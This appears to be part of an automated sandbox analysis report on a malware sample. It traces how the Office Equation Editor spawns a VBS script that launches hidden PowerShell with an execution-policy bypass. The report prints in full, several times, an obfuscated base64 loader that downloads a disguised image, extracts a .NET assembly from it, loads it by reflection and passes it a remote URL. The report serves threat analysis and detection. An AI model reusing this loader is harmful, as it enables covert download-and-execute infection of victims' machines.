        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1065Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1372Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1818Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5402Jump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3464Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exe TID: 3628Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3764Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep count: 1818 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep count: 5402 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: EQNEDT32.EXEBinary or memory string: zQvxQhUFo1P7aouBvNgeJ68gK0m0oTys3JrBX1amdEjGjZ2ibaKvt7ln2iEvGQ7W0qBZONpB7hWHXbWQywm1IxDgih6qxwnkU2kQ8IaEvTgR9Tl5iTxCf7t530H42XSJ9uV0vKJhhY71jiBVTDkkA8EohdgqemU1eWKbuzMN70jKQpAStC5xwZcdIeEUyBIees8UHoB2oqQcPN9hdRq6AvSKV4oF8GHyo1px9L9TS67BosV2N0xTzkAhzvKRJYrmmzKH
        Source: EQNEDT32.EXEBinary or memory string: qtHjvOpAfLerEri2qnnR7vr9VPkl7U1chS8Rxqp7yshp5ADJnijW83xO5iavSxAZkhEhakkY6BgEn9x5SlYEWKtQWkV8vIwq1WqeMUN76AsHtCj2qqWjn8PvpPmX2u97YpFTnTUTyjY5vjIo1rvAWvJY2bgIMCX3NWjJQ8rGmnzpP9T4zi3hC3MwBGVZObvJVWZKmrI9WFVfsr0TnKBUMyMkIGWVfT3Wzi2gO3YoG1LjrGgfSaagZ35ePW0GjGjMq1RV
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-379
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A04D1 mov edx, dword ptr fs:[00000030h]2_2_035A04D1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.6 443Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
        Yara detected Powershell download and execute
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTR
        Bypasses PowerShell execution policy
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjfbzse9nzvs0xsskuhnit01fwzm0xssneccpicgoj3pzdmltywdlvxjsid0gdmzjahr0chm6ly8xmde3lmzpbgvtywlslmnvbs9hcgkvzmknkydszs9nzxq/zmlszwtlet0yqwenkydfyldvovjldtq1ddcnkydcvtfrvmdzzdlwvdlwz1ntbhztdedyblrjq2zgag1us2oztem2u1f0swnpy19umzv3jnbrx3zpzd1mzdrmnje0ymiymdljnjjjmscrjzczmdk0nte3nmewota0zib2zmm7ell2d2viq2xpzw50id0gtmv3lu9ijysnamvjdcbtexn0zw0utmv0lldlyknsawvuddt6wxzpbwfnzuj5dgvzid0gell2d2viq2xpzw50lkrvd25sb2fkrgf0ysh6wxzpbwfnzvvybck7ell2aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxtonkyc6vvrgoc5hzxrtdhjpbmcoell2aw1hz2vcexrlcyk7ell2c3rhcnrgbgfnid0gdmzjpdxcqvnfnjrfu1rbulqnkyc+jysnpnzmyzsnkyd6wxzlbmrgbgfnid0gdmzjpdxcqvnfnjrfru5epj52zmm7ell2c3rhcnrjbmrleca9ihpzdmltywdlvgv4dc5jbmrlee9mkhpzdnn0yxj0rmxhzyk7ell2zw5ksw5kzscrj3ggpsb6wxzpbwfnzvrlehqusw5kzxhpjysnzih6wxynkydlbmrgbgfnktt6wxzzdgfydeluzgv4ic1nzsawic1hbmqgell2zw5ksw5kzxgglwd0ihpzdnn0yxj0sw5kzxg7ell2c3rhcnrjbmrlecarpsb6wxzzdgfydezsywcutgvuz3rooycrj3pzdmjhc2u2nexlbmd0aca9ihpzdmvuzeluzgv4ic0gell2c3rhcnrjbmrledt6wxziyxnlnjrdb21tyw5kid0gell2jysnaw1hz2vuzxh0lln1ynn0cmluzyh6wxzzdgfydeluzgv4lcb6wxziyxnlnjrmzw5ndccrj2gpo3pzdmjhc2u2nfjldmvyc2vkid0glwpvaw4nkycgkhpzdmjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbhb2egrm9yrwfjac1pymply3qgeyankyd6wxynkydfih0pwy0xli4tkhpzdmjhc2u2nenvbw1hbmqutgvuz3rokv07ell2y29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyh6wxziyxnlnjrszxzlcnnlzck7ell2bg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldoicrjzpmb2fkkhpzdmnvbw1hbmrcexqnkydlcyk7ell2dmfpjysntwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzch2zmnwqul2zmmpo3pzdnzhau1ldghvzc5jbnzva2uoell2bnvsbcwgqch2zmn0ehqundu0ndy1nju0m21tywrhbwjld2fhywfhywfhyxnub2yvoteuny44njeundaxly86chr0ahzmyywgdmzjzgvzyxrpdmfkb3zmyywgdmzjzgvzyxrpdmfkb3zmyywgdmzjzgvzyxrpdmfkb3zmyywgdmzjtvmnkydcdwlszhzmyywgdmzjzgvzyxrpdmfkb3zmyywgdmzjzgvzyxrpdmfkb3zmyyx2zmnkzxnhdgl2ywrvdmzjlhzmy2rlc2f0axzhzccrj292zmmsdicrj2zjzgvzyscrj3rpdmfkb3zmjysnyyx2zmnkzxnhdccrj2l2ywrvdmzjlhzmy2rlc2f0axzhzg92zmmsdmzjmxzmyyx2zmnkzxnhdgl2ywrvdmzjksk7jykuukvqbefjrsgnr29hjywnfccplljfugxby0uoj3pzdicsjyqnks5srvbsqwnfkcd2zmmnlfttdfjpbmddw0noyxjdmzkpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $pshome[4]+$pshome[34]+'x') (('zyvimageurl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2aa'+'_bwo9reu45t7'+'bu1kvgsd9pt9pgsslvstgrnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zyvwebclient = new-ob'+'ject system.net.webclient;zyvimagebytes = zyvwebclient.downloaddata(zyvimageurl);zyvimagetext = [system.text.encoding]:'+':utf8.getstring(zyvimagebytes);zyvstartflag = vfc<<base64_start'+'>'+'>vfc;'+'zyvendflag = vfc<<base64_end>>vfc;zyvstartindex = zyvimagetext.indexof(zyvstartflag);zyvendinde'+'x = zyvimagetext.indexo'+'f(zyv'+'endflag);zyvstartindex -ge 0 -and zyvendindex -gt zyvstartindex;zyvstartindex += zyvstartflag.length;'+'zyvbase64length = zyvendindex - zyvstartindex;zyvbase64command = zyv'+'imagetext.substring(zyvstartindex, zyvbase64lengt'+'h);zyvbase64reversed = -join'+' (zyvbase64command.tochararray() goa foreach-object { '+'zyv'+'_ })[-1..-(zyvbase64command.length)];zyvcommandbytes = [system.convert]::frombase64string(zyvbase64reversed);zyvloadedassembly = [system.reflection.assembly]:'+':load(zyvcommandbyt'+'es);zyvvai'+'method = [dnlib.io.home].getmethod(vfcvaivfc);zyvvaimethod.invoke(zyvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcms'+'buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').replace('goa','|').replace('zyv','$').replace('vfc',[string][char]39))"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjfbzse9nzvs0xsskuhnit01fwzm0xssneccpicgoj3pzdmltywdlvxjsid0gdmzjahr0chm6ly8xmde3lmzpbgvtywlslmnvbs9hcgkvzmknkydszs9nzxq/zmlszwtlet0yqwenkydfyldvovjldtq1ddcnkydcvtfrvmdzzdlwvdlwz1ntbhztdedyblrjq2zgag1us2oztem2u1f0swnpy19umzv3jnbrx3zpzd1mzdrmnje0ymiymdljnjjjmscrjzczmdk0nte3nmewota0zib2zmm7ell2d2viq2xpzw50id0gtmv3lu9ijysnamvjdcbtexn0zw0utmv0lldlyknsawvuddt6wxzpbwfnzuj5dgvzid0gell2d2viq2xpzw50lkrvd25sb2fkrgf0ysh6wxzpbwfnzvvybck7ell2aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxtonkyc6vvrgoc5hzxrtdhjpbmcoell2aw1hz2vcexrlcyk7ell2c3rhcnrgbgfnid0gdmzjpdxcqvnfnjrfu1rbulqnkyc+jysnpnzmyzsnkyd6wxzlbmrgbgfnid0gdmzjpdxcqvnfnjrfru5epj52zmm7ell2c3rhcnrjbmrleca9ihpzdmltywdlvgv4dc5jbmrlee9mkhpzdnn0yxj0rmxhzyk7ell2zw5ksw5kzscrj3ggpsb6wxzpbwfnzvrlehqusw5kzxhpjysnzih6wxynkydlbmrgbgfnktt6wxzzdgfydeluzgv4ic1nzsawic1hbmqgell2zw5ksw5kzxgglwd0ihpzdnn0yxj0sw5kzxg7ell2c3rhcnrjbmrlecarpsb6wxzzdgfydezsywcutgvuz3rooycrj3pzdmjhc2u2nexlbmd0aca9ihpzdmvuzeluzgv4ic0gell2c3rhcnrjbmrledt6wxziyxnlnjrdb21tyw5kid0gell2jysnaw1hz2vuzxh0lln1ynn0cmluzyh6wxzzdgfydeluzgv4lcb6wxziyxnlnjrmzw5ndccrj2gpo3pzdmjhc2u2nfjldmvyc2vkid0glwpvaw4nkycgkhpzdmjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbhb2egrm9yrwfjac1pymply3qgeyankyd6wxynkydfih0pwy0xli4tkhpzdmjhc2u2nenvbw1hbmqutgvuz3rokv07ell2y29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyh6wxziyxnlnjrszxzlcnnlzck7ell2bg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldoicrjzpmb2fkkhpzdmnvbw1hbmrcexqnkydlcyk7ell2dmfpjysntwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzch2zmnwqul2zmmpo3pzdnzhau1ldghvzc5jbnzva2uoell2bnvsbcwgqch2zmn0ehqundu0ndy1nju0m21tywrhbwjld2fhywfhywfhyxnub2yvoteuny44njeundaxly86chr0ahzmyywgdmzjzgvzyxrpdmfkb3zmyywgdmzjzgvzyxrpdmfkb3zmyywgdmzjzgvzyxrpdmfkb3zmyywgdmzjtvmnkydcdwlszhzmyywgdmzjzgvzyxrpdmfkb3zmyywgdmzjzgvzyxrpdmfkb3zmyyx2zmnkzxnhdgl2ywrvdmzjlhzmy2rlc2f0axzhzccrj292zmmsdicrj2zjzgvzyscrj3rpdmfkb3zmjysnyyx2zmnkzxnhdccrj2l2ywrvdmzjlhzmy2rlc2f0axzhzg92zmmsdmzjmxzmyyx2zmnkzxnhdgl2ywrvdmzjksk7jykuukvqbefjrsgnr29hjywnfccplljfugxby0uoj3pzdicsjyqnks5srvbsqwnfkcd2zmmnlfttdfjpbmddw0noyxjdmzkpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $pshome[4]+$pshome[34]+'x') (('zyvimageurl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2aa'+'_bwo9reu45t7'+'bu1kvgsd9pt9pgsslvstgrnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zyvwebclient = new-ob'+'ject system.net.webclient;zyvimagebytes = zyvwebclient.downloaddata(zyvimageurl);zyvimagetext = [system.text.encoding]:'+':utf8.getstring(zyvimagebytes);zyvstartflag = vfc<<base64_start'+'>'+'>vfc;'+'zyvendflag = vfc<<base64_end>>vfc;zyvstartindex = zyvimagetext.indexof(zyvstartflag);zyvendinde'+'x = zyvimagetext.indexo'+'f(zyv'+'endflag);zyvstartindex -ge 0 -and zyvendindex -gt zyvstartindex;zyvstartindex += zyvstartflag.length;'+'zyvbase64length = zyvendindex - zyvstartindex;zyvbase64command = zyv'+'imagetext.substring(zyvstartindex, zyvbase64lengt'+'h);zyvbase64reversed = -join'+' (zyvbase64command.tochararray() goa foreach-object { '+'zyv'+'_ })[-1..-(zyvbase64command.length)];zyvcommandbytes = [system.convert]::frombase64string(zyvbase64reversed);zyvloadedassembly = [system.reflection.assembly]:'+':load(zyvcommandbyt'+'es);zyvvai'+'method = [dnlib.io.home].getmethod(vfcvaivfc);zyvvaimethod.invoke(zyvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcms'+'buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').replace('goa','|').replace('zyv','$').replace('vfc',[string][char]39))"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
